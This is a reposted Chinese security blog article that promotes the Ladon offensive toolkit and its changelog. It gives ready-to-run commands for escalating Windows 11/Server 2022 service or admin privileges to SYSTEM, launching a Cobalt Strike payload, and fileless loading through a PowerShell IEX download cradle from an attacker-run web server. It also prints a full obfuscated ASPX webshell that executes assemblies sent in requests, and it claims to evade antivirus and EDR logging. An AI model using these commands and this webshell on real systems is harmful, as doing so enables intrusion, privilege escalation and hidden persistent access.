[提权]Win11/2022服务提升system权限

admin
admin
admin
138895
文章
114
评论
2023年7月12日01:49:18评论285 views字数 4035阅读13分27秒阅读模式
Ladon 11.2 2023.7.11[+]McpPotato    .NET>=4.0 Win11/2022提权至System  其它系统自测[u]GUI        加强版NC、Netcat监听客户端 连接速度优化 回显响应更快[u]Web        迷你Web服务器渗透保存的isvul.txt结果只保留IP(方便去重)[u]80天更新      超过编译日期80天,会提示文件损坏 请下最新版Ladon
2023.7.5修复一些bug
Ladon 11.1 2023.6.28[u]白名单启动  C:WindowsMicrosoft.NETFrameworkv4.0.30319regasm.exe /U Ladon.exe whoami[u]修复t=50线程 或结尾http 有些模块报错的Bug 如Ladon noping 192.168.1.0/B XXXX t=50 http[u]web      修复PowerShell DownLoadFile下载不了Bug[u]web      修复非根目录文件,下载或访问不到的Bug[u]LadonGUI    安装有.net 4.8时,默认加载Ladon911  如cmddll只有911有 无4.8用不了[+]exe2hex    EXE转HEX,CMD命令写入文件[+]exe2b64    EXE转Base64,CMD命令写入文件[u]cmddll    仅保留911本地使用,无需在目标生成,减小体积 1K也是肉[+]ZimbraVer  Zimbra版本探测[+]SharpGPO     .NET>=4.0 否则报错  35可编译 但执行报错

Ladon 11  2023.6.18[+]RocketMQexp        Apache RocketMQ CVE-2023-33246 远程命令执行漏洞EXP (可Ladon渗透Web服务器获取回显)[+]BypassAV          Ladon一键免杀工具 PY XOR随机加密 (Main函数需Public)[u]InfoScan          修复异常退出Bug[+]EventLog/LoginLog    一键读取登陆成功日志4624  错误4625要是爆破日志会很大[u]Exp、GUI、Study、Chat  更新UI按钮背景
[+]RunCmd/Cmd        执行Cmd命令/支持b64cmd  Ladon cmd whoami 或 Ladon b64cmd d2hvYW1p [+]RunPS/PowerShell      执行PowerShell命令/脚本 Ladon powershell c $PSVersionTable
20230603[u]LadonExp           支持GET连接MS17010漏洞CmdShell执行命令[u]LadonExp            生成EXE可解密Base64、Hex  PostShell结果[+]PostShell            增加HEX加密传输HEX解密结果,Base64结果解密Bug修复


Win11 Pro X64提权至System权限

管理员权限下获取SYSTEM权限,执行命令,弹出system权限CMD

Ladon RunSystem cmd.exe


[提权]Win11/2022服务提升system权限

实战不需要弹窗,直接启动C2即可,如CS生成的M为c:1.exe

Ladon RunSystem c:1.exe


服务权限提升至System权限

WebShell下,往往权限比较低,如IIS权限或服务权限等,Ladon内置以下模块Efspotato、godpotato、badpotato、sweetpotato、iislpe等均可提升至SYSTEM权限。mssqlcmd也内置sweetpotato、badpotato一键提升至SYSTEM权限。

Ladon McpPotato whoami

[提权]Win11/2022服务提升system权限

CobaltStrike下用法一致,当然也可右键菜单使用,更直观

[提权]Win11/2022服务提升system权限


PowerShell本地用法(ps1需上传,比起exe免杀效果更好)

powershell -exec bypass Import-Module .Ladon.ps1;Ladon McpPotato whoami


PowerShell内存加载 无文件落地用法

先使用Ladon web 80开启迷你web服务器

powershell -nop -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.8/Ladon.ps1'); Ladon McpPotato whoami"


LadonShell内存加载

在目标服务器植入以下aspx一句话,使用LadonShell连接,接下来就可以像在CS的beacon命令行下内存加载使用Ladon大部分功能了。整个过程渗透工具都不用上传至目标磁盘,目前市面上应该是唯一的

<%@ Page Language="C#" Debug="true" %><%@ Import Namespace="Su0079stu0065m.Diagu006eu006fsu0074u0069cs" %><%@ Import Namespace="Syu0073u0074em.Reu0066u006cu0065ction" %><script runat="server">    protected void Page_Load(object sender, EventArgs e)    {        if (!Page.IsPostBack)        {        string p="tom";            string c = Reu0071u0075u0065st.Cou006fu006bies
 != null ? Server.Htmlu0045u006eu0063ode(Ru0065u0071uest.Coou006bu0069u0065s
.Value) : null;            string[] g = null;            if (c != null)            {                byte[] b = Convert.FromBase64String(c);                string d = Encoding.UTF8.GetString(b);                g = d.Split(' ');                Su0079stem.Refu006cu0065u0063tion.Asu0073u0065u006dbly assu0065u006dbly = Syu0073u0074em.Reflu0065u0063u0074ion.Asu0073u0065u006dbly.Load(Reu0071uu0065st.Biu006eu0061ryRead(Reu0071u0075u0065st.TotalBytes));                Type[] types = assu0065u006dbly.GetTypes();                foreach (Type type in types)                {                    MethodInfo mt = type.Getu004du0065u0074hod("Main", BindingFlags.Public | BindingFlags.Static);                    if (mt != null)                    {                        Syu0073u0074em.IO.StringWriter sw = new Syu0073u0074em.IO.StringWriter();                        Console.SetOut(sw);                                         mt.Inu0076u006fke(null, new object[] { g });                                 Console.SetOut(new Syu0073u0074em.IO.StreamWriter(Console.OpenStandardOutput()));                        string o = sw.ToString();                        Response.Write(o);                        break;                    }                }                   }        }    }</script>

[提权]Win11/2022服务提升system权限

工具下必须包含Ladon的CS插件目录,特别是以下文件不能缺

[提权]Win11/2022服务提升system权限

PS:  dat文件也可以单独使用,体积非常小,如LadonInfo.dat是信息收集,包含各种协议,所有发包都是正常协议请求,不会被杀软和EDR拦截,系统里记录的也是正常日志,不会触发报警,不会引起怀疑。因为管理员或者是EDR处理可疑行为日志都来不及,更没功夫看正常日志。

Regasm白名单用法

C:WindowsMicrosoft.NETFrameworkv4.0.30319regasm.exe /U Ladon.exe McpPotato whoami

正确使用Ladon小技巧

首先使用ICMP即Ping命令所用的协议,探测B段或A段大概哪些网段存活,然后再针对存活网段,使用InfoScan一键使用20+协议探测收集各种信息,包含SMB、WMI、NbtScan、LDAP域控、Exchange邮服、Vmware版本、Cisco版本等等等,大家用了就知道。

相关命令如下

Ladon 192.168.1.8/c icmp Ladon 192.168.1.8/b icmp Ladon 192.168.1.8/c infoscan

PS: ICMP没有禁Ping用法,为什么?noping就是不用ping去探测

Soscks代理下使用 noping参数

Ladon noping 192.168.1.8/c ms17010Ladon noping 192.168.1.8/c infoscan

不是Ladon不支持ICMP,是FRP、EW、proxifier等这些工具不支持ICMP协议,就像小明能徒手扛起10吨乐山大佛,交给中间人(好比代理),中间人扛不动或不愿意送10吨乐山大佛,中间人没办法把它送到目地的,你说是小明扛不动?所以大家在使用工具前,不要无脑说工具不支持什么,而是先看看你用的所谓神器,它到底支持哪些协议,隧道不给力,你说是Ladon不支持?比如proxifier更新日志,明确最新版本修复了什么功能,支持哪些协议和工具,意味着之前的版本存在Bug或者不能保证Hook所有程序,强制相关协议一定走它,也明确了不支持哪些协议。所以代理环境下,有些协议可能探测不到系统版本信息,是因为代理工具不支持,从头到尾没把Ladon的“原话”传达给目标机器,其它工具也是一样,如果具备Ladon里的代理不支持的协议,其它工具同样探测不到。

Vpn接入目标内网不需要noping,当然想扫到禁Ping机器就使用

原文始发于微信公众号(K8实验室):[提权]Win11/2022服务提升system权限

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年7月12日01:49:18
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   [提权]Win11/2022服务提升system权限https://cn-sec.com/archives/1868883.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息